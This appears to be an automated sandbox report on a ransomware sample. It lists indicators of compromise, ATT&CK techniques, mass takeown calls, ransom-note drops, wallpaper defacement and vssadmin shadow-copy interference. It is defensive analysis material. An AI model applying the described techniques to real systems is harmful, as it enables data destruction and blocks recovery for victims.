6616	OiMV77U6.exe
7048	OiMV77U6.exe
3948	OiMV77U6.exe
5132	OiMV77U6.exe
5716	OiMV77U6.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	process
7072	takeown.exe
5476	takeown.exe
5340	takeown.exe
6160	takeown.exe
8048	takeown.exe
7004	takeown.exe
6984	takeown.exe
5880	takeown.exe
7576	takeown.exe
4920
7900	takeown.exe
6244	takeown.exe
7704	takeown.exe
5840	takeown.exe
7192	takeown.exe
6504	takeown.exe
5960	takeown.exe
2628	takeown.exe
7556	takeown.exe
5988	takeown.exe
6884	takeown.exe
3356
452	takeown.exe
8044	takeown.exe
7428	takeown.exe
7668	takeown.exe
7240	takeown.exe
6660	takeown.exe
2444	takeown.exe
3428	takeown.exe
6352	takeown.exe
5020	takeown.exe
7524	takeown.exe
5108	takeown.exe
7740	takeown.exe
2472	takeown.exe
7568	takeown.exe
8004	takeown.exe
6748	takeown.exe
8164	takeown.exe
1004	takeown.exe
8108	takeown.exe
7340	takeown.exe
1672	takeown.exe
5240	takeown.exe
3452	takeown.exe
2492	takeown.exe
7072	takeown.exe
6848	takeown.exe
5096	takeown.exe
6888	takeown.exe
7776
6676	takeown.exe
4036	takeown.exe
5704	takeown.exe
5768	takeown.exe
5144	takeown.exe
5672	takeown.exe
6916	takeown.exe
5472	takeown.exe
6012	takeown.exe
7484	takeown.exe
5228	takeown.exe
7080	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe	upx
behavioral6/memory/6076-1186-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/6084-1624-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/5836-1661-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/6108-1691-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/5828-1705-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/6016-1783-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/5972-1785-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/5208-2868-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/6196-2954-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/6264-2972-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/2188-3330-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/5816-3332-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/6076-3465-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/4740-3501-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/6464-4147-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/5572-4519-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/6956-4517-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/5732-2810-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/7084-2782-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/7052-2778-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/6948-2776-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/5832-5617-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/7352-5621-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/6760-5953-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/5740-6017-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/6908-2770-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/4768-6193-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/7052-6191-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/6432-6207-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/6540-6274-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/7252-6308-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/7544-6367-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/5452-6594-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/7608-6612-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/6584-6618-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/7412-6616-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/7024-6691-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/7100-6631-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/8076-6965-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/7720-6971-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/6152-7146-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/5412-7078-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/7516-7513-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/7936-7514-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/6200-7652-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/5292-7653-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/5680-7656-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/7588-7655-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/6728-6627-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/7108-6625-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/7476-6365-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/3276-6283-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/6668-7664-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/6864-7662-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/6152-7668-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/6096-7670-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/6152-7666-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/300-7675-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/6616-7679-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/7048-7681-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/3948-7684-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/5132-7686-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral6/memory/7320-7691-0x0000000000400000-0x0000000000477000-memory.dmp	upx

Drops desktop.ini file(s) 27 IoCs

Processes:

42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe

description	ioc	process
File opened for modification	C:\Users\Public\Videos\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Public\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe

Enumerates connected drives 3 TTPs 44 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

OiMV77U664.exe42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe

description	ioc	process
File opened (read-only)	\??\Z:	OiMV77U664.exe
File opened (read-only)	\??\W:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\U:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\R:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\N:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\J:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\E:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\M:	OiMV77U664.exe
File opened (read-only)	\??\V:	OiMV77U664.exe
File opened (read-only)	\??\S:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\L:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\A:	OiMV77U664.exe
File opened (read-only)	\??\E:	OiMV77U664.exe
File opened (read-only)	\??\K:	OiMV77U664.exe
File opened (read-only)	\??\S:	OiMV77U664.exe
File opened (read-only)	\??\U:	OiMV77U664.exe
File opened (read-only)	\??\Y:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\T:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\Q:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\P:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\I:	OiMV77U664.exe
File opened (read-only)	\??\N:	OiMV77U664.exe
File opened (read-only)	\??\X:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\R:	OiMV77U664.exe
File opened (read-only)	\??\Y:	OiMV77U664.exe
File opened (read-only)	\??\Q:	OiMV77U664.exe
File opened (read-only)	\??\K:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\I:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\B:	OiMV77U664.exe
File opened (read-only)	\??\G:	OiMV77U664.exe
File opened (read-only)	\??\H:	OiMV77U664.exe
File opened (read-only)	\??\L:	OiMV77U664.exe
File opened (read-only)	\??\P:	OiMV77U664.exe
File opened (read-only)	\??\O:	OiMV77U664.exe
File opened (read-only)	\??\X:	OiMV77U664.exe
File opened (read-only)	\??\Z:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\V:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\O:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\M:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\W:	OiMV77U664.exe
File opened (read-only)	\??\H:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\G:	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened (read-only)	\??\J:	OiMV77U664.exe
File opened (read-only)	\??\T:	OiMV77U664.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

154 myexternalip.com

flow	ioc
154	myexternalip.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\nCCQyqoj.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

Processes:

42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\ka.pak	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Trust Protection Lists\Mu\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\cs.pak	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\km.pak	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\vi.pak	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\VisualElements\LogoDev.png	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Extensions\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\uk.pak	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Locales\af.pak	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Notifications\SoftLandingAssetLight.gif	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\af.pak.DATA	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\VideoLAN\VLC\lua\meta\reader\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Trust Protection Lists\Sigma\LICENSE.DATA	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\lt.pak.DATA	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jps.exe	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Mozilla Firefox\firefox.cfg	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\deploy\messages_ja.properties	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre-1.8\Welcome.html	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\edge_feedback\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Trust Protection Lists\Sigma\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\VisualElements\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\identity_proxy\win10\identity_helper.Sparse.Beta.msix.DATA	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\legal\jdk\xmlresolver.md	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Trust Protection Lists\Sigma\Social	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Trust Protection Lists\Mu\Fingerprinting	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\cmm\CIEXYZ.pf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\uk.pak.DATA	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\fil.pak.DATA	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\management\jmxremote.password.template	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Mozilla Firefox\update-settings.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\js\common.js	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Mozilla Firefox\install.log	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\ext\sunjce_provider.jar	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk-1.8\jre\legal\javafx\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\legal\jdk\libpng.md	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\hu.pak	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\vlm.html	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Locales\pt-BR.pak	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\VisualElements\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\sr-Cyrl-BA.pak.DATA	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\it.pak	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\security\blacklisted.certs	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\identity_helper.exe	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\ResiliencyLinks\Locales\it.pak.DATA	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\tzmappings	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Mozilla Firefox\updater.ini	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Locales\hr.pak	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\lo.pak.DATA	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\pt-BR.pak	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\javaws.exe	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre-1.8\legal\javafx\jpeg_fx.md	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\LogoCanary.png	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\security\blacklist	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\ssvagent.exe	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\cy.pak	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Trust Protection Lists\Sigma\Cryptomining	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\tnameserv.exe	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCallbacks.h	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk-1.8\jre\bin\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\ug.pak	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

6028 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

6232 vssadmin.exe

pid	process
6028	schtasks.exe

pid	process
6232	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

powershell.exeOiMV77U664.exe

pid	process
3612	powershell.exe
3612	powershell.exe
3612	powershell.exe
5360	OiMV77U664.exe
5360	OiMV77U664.exe
5360	OiMV77U664.exe
5360	OiMV77U664.exe
5360	OiMV77U664.exe
5360	OiMV77U664.exe
5360	OiMV77U664.exe
5360	OiMV77U664.exe
5360	OiMV77U664.exe
5360	OiMV77U664.exe
5360	OiMV77U664.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

OiMV77U664.exe

pid process

5360 OiMV77U664.exe

pid	process
5360	OiMV77U664.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exetakeown.exeOiMV77U664.exetakeown.exetakeown.exevssvc.exeWMIC.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	3612	powershell.exe
Token: SeTakeOwnershipPrivilege	5168	takeown.exe
Token: SeDebugPrivilege	5360	OiMV77U664.exe
Token: SeLoadDriverPrivilege	5360	OiMV77U664.exe
